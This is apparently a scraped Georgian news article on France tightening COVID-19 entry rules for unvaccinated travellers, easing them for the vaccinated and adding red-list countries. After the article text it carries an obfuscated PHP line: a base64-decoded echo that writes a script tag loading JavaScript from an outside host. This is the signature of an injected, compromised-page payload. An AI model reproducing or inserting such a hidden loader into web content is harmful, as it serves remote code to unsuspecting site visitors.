celsiusi
ავერსი შნაიდერი
საფრანგეთი არავაქცინირებული პირებისთვის ქვეყანაში შესვლაზე დაწესებულ შეზღუდვებს აძლიერებს, ვაქცინირებულებისთვის კი პირიქით - ამსუბუქებს. შესაბამისი განცხადება საფრანგეთის პრემიერ-მინისტრმა ჟან კასტექსმა გააკეთა.
 
კერძოდ, 18 ივლისიდან, საფრანგეთში გაერთიანებული სამეფოდან, ესპანეთიდან, პორტუგალიიდან, კვიპროსიდან, ნიდერლანდებიდან და საბერძნეთიდან შესვლის მსურველმა არავაქცინირებულმა მოქალაქეებმა კოვიდ 19-ზე ბოლო 24 საათში ჩატარებული ტესტის უარყოფითი პასუხის დამადასტურებელი დოკუმენტი უნდა წარადგინონ. დღემდე კი გაერთიანებული სამეფოდან ჩასული მგზავრებისთვის ბოლო 48 საათში, დანარჩენი ქვეყნიდან ჩასულებისთვის კი ბოლო 72 საათში ჩატარებული ტესტის პასუხის წარდგენა იყო საჭირო.
 
რაც შეეხება ნებისმიერი ქვეყნიდან ჩასულ სრულად ვაქცინირებულ მოქალაქეებს, მათ დღეიდან ტესტის პასუხს აღარ მოსთხოვენ.
 
„იმის გამო, რომ ვაქცინები ეფექტურია ვირუსის საწინააღმდეგოდ, კერძოდ მისი „დელტა“ ვარიანტის წინააღმდეგ, შეზღუდვები მსუბუქდება იმ მგზავრებისთვის, რომლებიც სრულად არიან ვაქცინირებული ევროპის მედიკამენტების სააგენტოს მიერ აღიარებული ვაქცინით („ფაიზერი“, „მოდერნა“, „ასტრაზენეკა“ ან „ჯონსენი“),“- აღნიშნა პრემიერმა.
 
ამასთან, ტუნისიდან, მოზამბიკიდან, კუბიდან და ინდონეზიიდან შესვლის მსურველმა მგზავრებმა მოგზაურობის მიზეზი უნდა ახსნან, ჩასვლამდე ჩატარებული ტესტის უარყოფითი პასუხო წარადგინონ და ჩასვლის შემდეგ კი 10-დღიანი კარანტინი გაიარონ, ვინაიდან ეს ქვეყნები საფრანგეთის ე.წ. „წითელ სიას“ დაემატნენ, რომელში შეტანილი ქვეყნებისთვის აღნიშნული წესები ძალაშია.
1055
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");